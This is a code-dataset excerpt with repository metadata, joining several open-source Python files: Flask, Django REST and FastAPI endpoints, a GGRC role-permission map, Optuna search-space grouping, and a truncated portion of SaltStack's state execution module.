        self._previous_epoch_detail = to_load['_previous_epoch_detail']

    def get_training_length(self):
        # (period, unit) pair describing this trigger's interval.
        return (self.period, self.unit)

    def __str__(self):
        """Returns a string describing the class and interval

        Returns:
            str: IntervalTrigger(<period>, '<unit>')
        """
        return '{}({}, \'{}\')'.format(
            self.__class__.__name__, self.period, self.unit
        )
| 34.449541
| 79
| 0.628495
|
4a04c50914cd621e0dd2d3c7118a67d1abdc1195
| 177
|
py
|
Python
|
app/__init__.py
|
sythe100/maintenance-minder
|
f6c1494f6f8108ac206ba32bd2cd7c9bf85e9bbd
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
sythe100/maintenance-minder
|
f6c1494f6f8108ac206ba32bd2cd7c9bf85e9bbd
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
sythe100/maintenance-minder
|
f6c1494f6f8108ac206ba32bd2cd7c9bf85e9bbd
|
[
"MIT"
] | null | null | null |
from flask import Flask
# Fixed import: the ``flask.ext.*`` namespace was removed in Flask 1.0;
# extensions must be imported from their own package.
from flask_sqlalchemy import SQLAlchemy

# Application factory state: the Flask app, configured from the top-level
# ``config`` module, and the shared SQLAlchemy database handle.
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)

# Imported last, for side effects: views and models themselves import ``app``
# and ``db`` from this package, so importing earlier would be circular.
from app import views, models  # noqa: E402,F401
| 17.7
| 43
| 0.785311
|
4a04c57033fb6f6435f86a0c86aa55290b4a06c8
| 1,320
|
py
|
Python
|
helium/auth/views/apis/usersettingsviews.py
|
HeliumEdu/platform
|
54b82a40c21fd14d1b7f37d5f2afb51eea2f8cf5
|
[
"MIT"
] | 15
|
2018-01-02T00:44:58.000Z
|
2022-03-19T21:38:29.000Z
|
helium/auth/views/apis/usersettingsviews.py
|
HeliumEdu/platform
|
54b82a40c21fd14d1b7f37d5f2afb51eea2f8cf5
|
[
"MIT"
] | 327
|
2017-11-24T22:36:07.000Z
|
2022-02-10T08:09:08.000Z
|
helium/auth/views/apis/usersettingsviews.py
|
HeliumEdu/platform
|
54b82a40c21fd14d1b7f37d5f2afb51eea2f8cf5
|
[
"MIT"
] | 3
|
2018-05-04T17:57:58.000Z
|
2021-11-18T13:58:46.000Z
|
import logging
from django.contrib.auth import get_user_model
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from helium.auth.serializers.usersettingsserializer import UserSettingsSerializer
from helium.common.views.views import HeliumAPIView
__author__ = "Alex Laird"
__copyright__ = "Copyright 2021, Helium Edu"
__version__ = "1.4.46"
logger = logging.getLogger(__name__)
class UserSettingsApiDetailView(HeliumAPIView):
"""
put:
Update the authenticated user's settings. This endpoint only updates the fields given (i.e. no need to PATCH
for partials data).
For more details pertaining to choice field values, [see here](https://github.com/HeliumEdu/platform/wiki#choices).
"""
queryset = get_user_model().objects.all()
serializer_class = UserSettingsSerializer
permission_classes = (IsAuthenticated,)
def get_object(self):
return self.request.user
def put(self, request, *args, **kwargs):
user = self.get_object()
serializer = self.get_serializer(user.settings, data=request.data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
logger.info(f'Settings updated for user {user.get_username()}')
return Response(serializer.data)
| 31.428571
| 119
| 0.744697
|
4a04c6923c9faa9634338334fe24955e29a5f0fe
| 2,910
|
py
|
Python
|
src/ggrc_basic_permissions/roles/Reader.py
|
Killswitchz/ggrc-core
|
2460df94daf66727af248ad821462692917c97a9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/ggrc_basic_permissions/roles/Reader.py
|
Killswitchz/ggrc-core
|
2460df94daf66727af248ad821462692917c97a9
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2018-07-06T00:04:23.000Z
|
2021-02-26T21:13:20.000Z
|
src/ggrc_basic_permissions/roles/Reader.py
|
Killswitchz/ggrc-core
|
2460df94daf66727af248ad821462692917c97a9
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-11-11T22:16:56.000Z
|
2017-11-11T22:16:56.000Z
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with configuration of the Reader role's permissions."""
# pylint: disable=invalid-name
from ggrc_basic_permissions.roles.Creator import owner_update
scope = "System"
description = """
This role grants a user basic, read-only, access permission to a GGRC
instance.
"""
permissions = {
"read": [
"AccessControlList",
"Audit",
"Snapshot",
"Categorization",
"Category",
"ControlCategory",
"ControlAssertion",
"Control",
"Comment",
"Assessment",
"AssessmentTemplate",
"CustomAttributeDefinition",
"CustomAttributeValue",
"Issue",
"ControlControl",
"DataAsset",
"AccessGroup",
"Directive",
"Contract",
"Policy",
"Regulation",
"Standard",
"Document",
"Facility",
"Help",
"Market",
"Objective",
"ObjectControl",
"ObjectObjective",
"ObjectPerson",
"Option",
"OrgGroup",
"Vendor",
"PopulationSample",
"Product",
"ProgramControl",
"ProgramDirective",
"Project",
"Relationship",
"Section",
"Clause",
"SystemOrProcess",
"System",
"Process",
"SystemControl",
"SystemSystem",
"Person",
"Program",
"Revision",
"Role",
"UserRole",
"Context",
{
"type": "BackgroundTask",
"terms": {
"property_name": "modified_by",
"value": "$current_user"
},
"condition": "is"
},
],
"create": [
"Workflow"
"Categorization",
"Category",
"ControlCategory",
"ControlAssertion",
"Control",
"Comment",
"DataAsset",
"AccessGroup",
"Directive",
"Contract",
"Policy",
"Regulation",
"Standard",
"Document",
"Facility",
"Help",
"Market",
"Objective",
"ObjectPerson",
"Option",
"OrgGroup",
"Vendor",
"PopulationSample",
"Product",
"Project",
{
"type": "Relationship",
"terms": {
"property_name": "source,destination",
"action": "update"
},
"condition": "relationship",
},
"Section",
"Clause",
"SystemOrProcess",
"System",
"Process",
"Person",
"Program",
"Role",
"Context",
"BackgroundTask",
],
"view_object_page": [
"__GGRC_ALL__"
],
"update": owner_update,
"delete": owner_update,
}
| 22.045455
| 78
| 0.47354
|
4a04c755e231cb5561fabc7e7105c8655722b358
| 2,621
|
py
|
Python
|
src/dispatch/incident_priority/views.py
|
BuildJet/dispatch
|
d9fcaabefecfb24bbf3bbed1ed942084b7bdbea2
|
[
"Apache-2.0"
] | null | null | null |
src/dispatch/incident_priority/views.py
|
BuildJet/dispatch
|
d9fcaabefecfb24bbf3bbed1ed942084b7bdbea2
|
[
"Apache-2.0"
] | null | null | null |
src/dispatch/incident_priority/views.py
|
BuildJet/dispatch
|
d9fcaabefecfb24bbf3bbed1ed942084b7bdbea2
|
[
"Apache-2.0"
] | null | null | null |
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from dispatch.database.core import get_db
from dispatch.database.service import common_parameters, search_filter_sort_paginate
from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency
from .models import (
IncidentPriorityCreate,
IncidentPriorityPagination,
IncidentPriorityRead,
IncidentPriorityUpdate,
)
from .service import create, get, update
router = APIRouter()
@router.get("/", response_model=IncidentPriorityPagination, tags=["incident_priorities"])
def get_incident_priorities(*, common: dict = Depends(common_parameters)):
"""
Returns all incident priorities.
"""
return search_filter_sort_paginate(model="IncidentPriority", **common)
@router.post(
"/",
response_model=IncidentPriorityRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def create_incident_priority(
*,
db_session: Session = Depends(get_db),
incident_priority_in: IncidentPriorityCreate,
):
"""
Create a new incident priority.
"""
incident_priority = create(db_session=db_session, incident_priority_in=incident_priority_in)
return incident_priority
@router.put(
"/{incident_priority_id}",
response_model=IncidentPriorityRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def update_incident_priority(
*,
db_session: Session = Depends(get_db),
incident_priority_id: int,
incident_priority_in: IncidentPriorityUpdate,
):
"""
Update an existing incident priority.
"""
incident_priority = get(db_session=db_session, incident_priority_id=incident_priority_id)
if not incident_priority:
raise HTTPException(
status_code=404, detail="The incident priority with this id does not exist."
)
incident_priority = update(
db_session=db_session,
incident_priority=incident_priority,
incident_priority_in=incident_priority_in,
)
return incident_priority
@router.get("/{incident_priority_id}", response_model=IncidentPriorityRead)
def get_incident_priority(*, db_session: Session = Depends(get_db), incident_priority_id: int):
"""
Get an incident priority.
"""
incident_priority = get(db_session=db_session, incident_priority_id=incident_priority_id)
if not incident_priority:
raise HTTPException(
status_code=404, detail="The incident priority with this id does not exist."
)
return incident_priority
| 31.202381
| 96
| 0.751622
|
4a04c792708b0dfcc86f28746d98e08203ddff23
| 125
|
py
|
Python
|
setup.py
|
jmathison/gym-simpleflappy
|
54acd54346f0ba4a611120a9ebba69acf0bae8b5
|
[
"MIT"
] | null | null | null |
setup.py
|
jmathison/gym-simpleflappy
|
54acd54346f0ba4a611120a9ebba69acf0bae8b5
|
[
"MIT"
] | null | null | null |
setup.py
|
jmathison/gym-simpleflappy
|
54acd54346f0ba4a611120a9ebba69acf0bae8b5
|
[
"MIT"
] | 1
|
2019-09-19T05:26:02.000Z
|
2019-09-19T05:26:02.000Z
|
from setuptools import setup
setup(name='gym_simpleflappy',
version='0.0.1',
install_requires=['gym','pygame']
)
| 20.833333
| 39
| 0.68
|
4a04c824459e8f20ee32e2dde4e638af1f687df0
| 255
|
py
|
Python
|
bin/template_minimal.py
|
cirosantilli/python-utils
|
3854d2c7973c6382f76e311423c219bccacb8c1d
|
[
"MIT"
] | 1
|
2018-10-04T15:29:04.000Z
|
2018-10-04T15:29:04.000Z
|
bin/template_minimal.py
|
cirosantilli/python-utils
|
3854d2c7973c6382f76e311423c219bccacb8c1d
|
[
"MIT"
] | null | null | null |
bin/template_minimal.py
|
cirosantilli/python-utils
|
3854d2c7973c6382f76e311423c219bccacb8c1d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#==================================================
#
# Ciro D. Santilli
#
# default argparsers
#
#==================================================
if __name__ == "__main__":
import doctest
doctest.testmod()
| 9.807692
| 51
| 0.352941
|
4a04c879a8a89aafc1478bec9b1c9f5a0525270e
| 2,344
|
py
|
Python
|
optuna/samplers/_search_space/group_decomposed.py
|
occamzrazor/optuna
|
89e38174e0f4ce245d31ea0e5fe3f6062deb093a
|
[
"MIT"
] | 1
|
2021-02-25T12:30:12.000Z
|
2021-02-25T12:30:12.000Z
|
optuna/samplers/_search_space/group_decomposed.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | 5
|
2021-05-23T08:39:21.000Z
|
2021-05-23T09:34:55.000Z
|
optuna/samplers/_search_space/group_decomposed.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | null | null | null |
import copy
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
from optuna.distributions import BaseDistribution
from optuna.study import BaseStudy
from optuna.trial import TrialState
class _SearchSpaceGroup(object):
def __init__(self) -> None:
self._search_spaces: List[Dict[str, BaseDistribution]] = []
@property
def search_spaces(self) -> List[Dict[str, BaseDistribution]]:
return self._search_spaces
def add_distributions(self, distributions: Dict[str, BaseDistribution]) -> None:
dist_keys = set(distributions.keys())
next_search_spaces = []
for search_space in self._search_spaces:
keys = set(search_space.keys())
next_search_spaces.append({name: search_space[name] for name in keys & dist_keys})
next_search_spaces.append({name: search_space[name] for name in keys - dist_keys})
dist_keys -= keys
next_search_spaces.append({name: distributions[name] for name in dist_keys})
self._search_spaces = list(
filter(lambda search_space: len(search_space) > 0, next_search_spaces)
)
class _GroupDecomposedSearchSpace(object):
def __init__(self, include_pruned: bool = False) -> None:
self._search_space = _SearchSpaceGroup()
self._study_id: Optional[int] = None
self._include_pruned = include_pruned
def calculate(self, study: BaseStudy) -> _SearchSpaceGroup:
if self._study_id is None:
self._study_id = study._study_id
else:
# Note that the check below is meaningless when `InMemoryStorage` is used
# because `InMemoryStorage.create_new_study` always returns the same study ID.
if self._study_id != study._study_id:
raise ValueError("`_GroupDecomposedSearchSpace` cannot handle multiple studies.")
states_of_interest: Tuple[TrialState, ...]
if self._include_pruned:
states_of_interest = (TrialState.COMPLETE, TrialState.PRUNED)
else:
states_of_interest = (TrialState.COMPLETE,)
for trial in study.get_trials(deepcopy=False, states=states_of_interest):
self._search_space.add_distributions(trial.distributions)
return copy.deepcopy(self._search_space)
| 37.206349
| 97
| 0.691126
|
4a04caf72dcf589752ad34b253ef70f1b92c083d
| 135,666
|
py
|
Python
|
salt/state.py
|
Rafflecopter/salt
|
08bbfcd4d9b93351d7d5d25b097e892026b6f1cd
|
[
"Apache-2.0"
] | null | null | null |
salt/state.py
|
Rafflecopter/salt
|
08bbfcd4d9b93351d7d5d25b097e892026b6f1cd
|
[
"Apache-2.0"
] | null | null | null |
salt/state.py
|
Rafflecopter/salt
|
08bbfcd4d9b93351d7d5d25b097e892026b6f1cd
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
The module used to execute states in salt. A state is unlike a module
execution in that instead of just executing a command it ensure that a
certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
'''
# Import python libs
from __future__ import absolute_import
import os
import sys
import copy
import site
import fnmatch
import logging
import datetime
import traceback
# Import salt libs
import salt.utils
import salt.loader
import salt.minion
import salt.pillar
import salt.fileclient
import salt.utils.event
import salt.utils.url
import salt.syspaths as syspaths
from salt.utils import context, immutabletypes
from salt.template import compile_template, compile_template_str
from salt.exceptions import SaltRenderError, SaltReqTimeoutError, SaltException
from salt.utils.odict import OrderedDict, DefaultOrderedDict
# Import third party libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset([
'onchanges',
'onfail',
'prereq',
'prerequired',
'watch',
'require',
'listen',
])
STATE_REQUISITE_IN_KEYWORDS = frozenset([
'onchanges_in',
'onfail_in',
'prereq_in',
'watch_in',
'require_in',
'listen_in',
])
STATE_RUNTIME_KEYWORDS = frozenset([
'fun',
'state',
'check_cmd',
'failhard',
'onlyif',
'unless',
'order',
'prereq',
'prereq_in',
'prerequired',
'reload_modules',
'reload_grains',
'reload_pillar',
'fire_event',
'saltenv',
'use',
'use_in',
'__env__',
'__sls__',
'__id__',
'__pub_user',
'__pub_arg',
'__pub_jid',
'__pub_fun',
'__pub_tgt',
'__pub_ret',
'__pub_pid',
'__pub_tgt_type',
'__prereq__',
])
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(STATE_REQUISITE_IN_KEYWORDS).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
'''
Take a low tag and split it back into the low dict that it came from
'''
state, id_, name, fun = tag.split('_|-')
return {'state': state,
'__id__': id_,
'name': name,
'fun': fun}
def _gen_tag(low):
'''
Generate the running dict tag string from the low data structure
'''
return '{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}'.format(low)
def _l_tag(name, id_):
low = {'name': 'listen_{0}'.format(name),
'__id__': 'listen_{0}'.format(id_),
'state': 'Listen_Error',
'fun': 'Listen_Error'}
return _gen_tag(low)
def trim_req(req):
'''
Trim any function off of a requisite
'''
reqfirst = next(iter(req))
if '.' in reqfirst:
return {reqfirst.split('.')[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
'''
Return a set of the arguments passed to the named state
'''
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
'''
Scan high data for the id referencing the given name
'''
ext_id = ''
if name in high:
ext_id = name
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(
high[nid][state],
list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id = nid
return ext_id
def format_log(ret):
'''
Format the state into a log message
'''
msg = ''
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if 'changes' in ret:
# Yep, looks like a valid state return
chg = ret['changes']
if not chg:
if ret['comment']:
msg = ret['comment']
else:
msg = 'No changes made for {0[name]}'.format(ret)
elif isinstance(chg, dict):
if 'diff' in chg:
if isinstance(chg['diff'], six.string_types):
msg = 'File changed:\n{0}'.format(chg['diff'])
if all([isinstance(x, dict) for x in six.itervalues(chg)]):
if all([('old' in x and 'new' in x)
for x in six.itervalues(chg)]):
msg = 'Made the following changes:\n'
for pkg in chg:
old = chg[pkg]['old']
if not old and old not in (False, None):
old = 'absent'
new = chg[pkg]['new']
if not new and new not in (False, None):
new = 'absent'
msg += '{0} changed from {1} to ' \
'{2}\n'.format(pkg, old, new)
if not msg:
msg = str(ret['changes'])
if ret['result'] is True or ret['result'] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
'''
Compile the master side low state data, and build the hidden state file
'''
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
class StateError(Exception):
'''
Custom exception class.
'''
pass
class Compiler(object):
'''
Class used to compile and manage the High Data structure
'''
def __init__(self, opts):
self.opts = opts
self.rend = salt.loader.render(self.opts, {})
# We need __setstate__ and __getstate__ to avoid pickling errors since
# 'self.rend' contains a function reference which is not picklable.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts}
def render_template(self, template, **kwargs):
'''
Enforce the states in a template
'''
high = compile_template(
template, self.rend, self.opts['renderer'], **kwargs)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
'''
Turns dot delimited function refs into function strings
'''
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
# Is this is a short state? It needs to be padded!
if '.' in high[name]:
comps = high[name].split('.')
if len(comps) >= 2:
# Merge the comps
comps[1] = '.'.join(comps[1:len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith('_'):
continue
if not isinstance(high[name][key], list):
continue
if '.' in key:
comps = key.split('.')
if len(comps) >= 2:
# Merge the comps
comps[1] = '.'.join(comps[1:len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
'''
Verify that the high data is viable and follows the data structure
'''
errors = []
if not isinstance(high, dict):
errors.append('High data is not a dictionary and is invalid')
reqs = {}
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
if not isinstance(name, six.string_types):
errors.append(
'ID {0!r} in SLS {1!r} is not formed as a string, but is '
'a {2}'.format(name, body['__sls__'], type(name).__name__)
)
if not isinstance(body, dict):
err = ('The type {0} in {1} is not formatted as a dictionary'
.format(name, body))
errors.append(err)
continue
for state in body:
if state.startswith('__'):
continue
if not isinstance(body[state], list):
errors.append(
'State {0!r} in SLS {1!r} is not formed as a list'
.format(name, body['__sls__'])
)
else:
fun = 0
if '.' in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if ' ' in arg.strip():
errors.append(('The function "{0}" in state '
'"{1}" in SLS "{2}" has '
'whitespace, a function with whitespace is '
'not supported, perhaps this is an argument '
'that is missing a ":"').format(
arg,
name,
body['__sls__']))
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ('require', 'watch', 'prereq'):
if not isinstance(arg[argfirst], list):
errors.append(('The {0}'
' statement in state {1!r} in SLS {2!r} '
'needs to be formed as a list').format(
argfirst,
name,
body['__sls__']
))
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {'state': state}
for req in arg[argfirst]:
if not isinstance(req, dict):
err = ('Requisite declaration {0}'
' in SLS {1} is not formed as a'
' single key dictionary').format(
req,
body['__sls__'])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if '.' in req_key:
errors.append((
'Invalid requisite type {0!r} '
'in state {1!r}, in SLS '
'{2!r}. Requisite types must '
'not contain dots, did you '
'mean {3!r}?'.format(
req_key,
name,
body['__sls__'],
req_key[:req_key.find('.')]
)
))
if not ishashable(req_val):
errors.append((
'Illegal requisite "{0}", '
'is SLS {1}\n'
).format(
str(req_val),
body['__sls__']))
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if reqs[req_val]['state'] == reqs[name][req_val]:
err = ('A recursive '
'requisite was found, SLS '
'"{0}" ID "{1}" ID "{2}"'
).format(
body['__sls__'],
name,
req_val
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(('Multiple dictionaries '
'defined in argument of state {0!r} in SLS'
' {1!r}').format(
name,
body['__sls__']))
if not fun:
if state == 'require' or state == 'watch':
continue
errors.append(('No function declared in state {0!r} in'
' SLS {1!r}').format(state, body['__sls__']))
elif fun > 1:
errors.append(
'Too many functions declared in state {0!r} in '
'SLS {1!r}'.format(state, body['__sls__'])
)
return errors
def order_chunks(self, chunks):
'''
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
'''
cap = 1
for chunk in chunks:
if 'order' in chunk:
if not isinstance(chunk['order'], int):
continue
chunk_order = chunk['order']
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if 'order' not in chunk:
chunk['order'] = cap
continue
if not isinstance(chunk['order'], (int, float)):
if chunk['order'] == 'last':
chunk['order'] = cap + 1000000
else:
chunk['order'] = cap
if 'name_order' in chunk:
chunk['order'] = chunk['order'] + chunk.pop('name_order') / 10000.0
if chunk['order'] < 0:
chunk['order'] = cap + 1000000 + chunk['order']
chunks.sort(key=lambda chunk: (chunk['order'], '{0[state]}{0[name]}{0[fun]}'.format(chunk)))
return chunks
def compile_high_data(self, high):
'''
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
'''
chunks = []
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
for state, run in six.iteritems(body):
funcs = set()
names = set()
if state.startswith('__'):
continue
chunk = {'state': state,
'name': name}
if '__sls__' in body:
chunk['__sls__'] = body['__sls__']
if '__env__' in body:
chunk['__env__'] = body['__env__']
chunk['__id__'] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == 'names':
names.update(val)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live['name'] = low_name
live.update(entry[low_name][0])
else:
live['name'] = entry
live['name_order'] = name_order
name_order = name_order + 1
for fun in funcs:
live['fun'] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live['fun'] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
'''
Read in the __exclude__ list and remove all excluded objects from the
high data
'''
if '__exclude__' not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop('__exclude__')
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == 'sls':
ex_sls.add(exc['sls'])
elif key == 'id':
ex_id.add(exc['id'])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associtaed ids
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
if body.get('__sls__', '') in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
class State(object):
'''
Class used to execute salt states
'''
def __init__(self, opts, pillar=None, jid=None):
if 'grains' not in opts:
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
self._pillar_override = pillar
self.opts['pillar'] = self._gather_pillar()
self.state_con = {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
def _gather_pillar(self):
'''
Whenever a state run starts, gather the pillar data fresh
'''
pillar = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillar=self._pillar_override,
pillarenv=self.opts.get('pillarenv')
)
ret = pillar.compile_pillar()
if self._pillar_override and isinstance(self._pillar_override, dict):
ret.update(self._pillar_override)
return ret
def _mod_init(self, low):
'''
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
'''
# ensure that the module is loaded
self.states['{0}.{1}'.format(low['state'], low['fun'])] # pylint: disable=W0106
minit = '{0}.mod_init'.format(low['state'])
if low['state'] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low['state'])
def _mod_aggregate(self, low, running, chunks):
'''
Execute the aggregation systems to runtime modify the low chunk
'''
agg_opt = self.functions['config.option']('state_aggregate')
if low.get('aggregate') is True:
agg_opt = low['aggregate']
if agg_opt is True:
agg_opt = [low['state']]
else:
return low
if low['state'] in agg_opt and not low.get('__agg__'):
agg_fun = '{0}.mod_aggregate'.format(low['state'])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low['__agg__'] = True
except TypeError:
log.error('Failed to execute aggregate for state {0}'.format(low['state']))
return low
def _run_check(self, low_data):
'''
Check that unless doesn't return 0, and that onlyif returns a 0.
'''
ret = {'result': False}
cmd_opts = {}
if 'shell' in self.opts['grains']:
cmd_opts['shell'] = self.opts['grains'].get('shell')
if 'onlyif' in low_data:
if not isinstance(low_data['onlyif'], list):
low_data_onlyif = [low_data['onlyif']]
else:
low_data_onlyif = low_data['onlyif']
for entry in low_data_onlyif:
cmd = self.functions['cmd.retcode'](
entry, ignore_retcode=True, python_shell=True, **cmd_opts)
log.debug('Last command return code: {0}'.format(cmd))
if cmd != 0 and ret['result'] is False:
ret.update({'comment': 'onlyif execution failed',
'skip_watch': True,
'result': True})
return ret
elif cmd == 0:
ret.update({'comment': 'onlyif execution succeeded', 'result': False})
return ret
if 'unless' in low_data:
if not isinstance(low_data['unless'], list):
low_data_unless = [low_data['unless']]
else:
low_data_unless = low_data['unless']
for entry in low_data_unless:
cmd = self.functions['cmd.retcode'](
entry, ignore_retcode=True, python_shell=True, **cmd_opts)
log.debug('Last command return code: {0}'.format(cmd))
if cmd == 0 and ret['result'] is False:
ret.update({'comment': 'unless execution succeeded',
'skip_watch': True,
'result': True})
elif cmd != 0:
ret.update({'comment': 'unless execution failed', 'result': False})
return ret
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
'''
Alter the way a successful state run is determined
'''
ret = {'result': False}
cmd_opts = {}
if 'shell' in self.opts['grains']:
cmd_opts['shell'] = self.opts['grains'].get('shell')
for entry in low_data['check_cmd']:
cmd = self.functions['cmd.retcode'](
entry, ignore_retcode=True, python_shell=True, **cmd_opts)
log.debug('Last command return code: {0}'.format(cmd))
if cmd == 0 and ret['result'] is False:
ret.update({'comment': 'check_cmd determined the state succeeded', 'result': True})
elif cmd != 0:
ret.update({'comment': 'check_cmd determined the state failed', 'result': False})
return ret
return ret
def load_modules(self, data=None):
'''
Load the modules into the state
'''
log.info('Loading fresh modules for state activity')
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, self.state_con, utils=self.utils)
if isinstance(data, dict):
if data.get('provider', False):
if isinstance(data['provider'], str):
providers = [{data['state']: data['provider']}]
elif isinstance(data['provider'], list):
providers = data['provider']
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(self.opts,
provider[mod],
self.functions)
if funcs:
for func in funcs:
f_key = '{0}{1}'.format(
mod,
func[func.rindex('.'):]
)
self.functions[f_key] = funcs[func]
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions, states=self.states)
def module_refresh(self):
'''
Refresh all the modules
'''
log.debug('Refreshing modules...')
if self.opts['grains'].get('os') != 'MacOS':
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload(site)
except RuntimeError:
log.error('Error encountered during module reload. Modules were not reloaded.')
self.load_modules()
if not self.opts.get('local', False) and self.opts.get('multiprocessing', True):
self.functions['saltutil.refresh_modules']()
def check_refresh(self, data, ret):
'''
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
something. If the file function is managed check to see if the file is a
possible module type, e.g. a python, pyx, or .so. Always refresh if the
function is recurse, since that can lay down anything.
'''
_reload_modules = False
if data.get('reload_grains', False):
log.debug('Refreshing grains...')
self.opts['grains'] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get('reload_pillar', False):
log.debug('Refreshing pillar...')
self.opts['pillar'] = self._gather_pillar()
_reload_modules = True
if data.get('reload_modules', False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if not ret['changes']:
return
if data['state'] == 'file':
if data['fun'] == 'managed':
if data['name'].endswith(
